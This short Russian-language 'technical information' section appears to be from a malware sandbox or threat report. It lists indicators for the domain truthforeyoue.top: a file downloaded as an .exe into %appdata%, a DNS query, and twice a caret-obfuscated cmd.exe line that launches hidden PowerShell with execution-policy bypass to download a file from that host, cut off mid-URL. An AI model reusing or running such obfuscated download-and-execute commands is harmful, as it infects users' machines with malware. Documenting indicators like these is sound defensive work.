Техническая информация
- http://truthforeyoue.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^Ow^eRSheLl.e^xe -E^XEcu^t^io^nPO^L^Icy ^b^YPAss -^no^P^roFiLE -win^dO^wSTYLe hId^d^EN^ ^(NEw-^o^BJECT^ SySTEm.N^e^t^.^weBCLI^E^nT).^DOWN^LoaD^FI^le(^'http://truthforeyoue....
- DNS ASK tr####oreyoue.top
- '<SYSTEM32>\cmd.exe' /C "p^Ow^eRSheLl.e^xe -E^XEcu^t^io^nPO^L^Icy ^b^YPAss -^no^P^roFiLE -win^dO^wSTYLe hId^d^EN^ ^(NEw-^o^BJECT^ SySTEm.N^e^t^.^weBCLI^E^nT).^DOWN^LoaD^FI^le(^'http://truthforeyoue....' (со скрытым окном)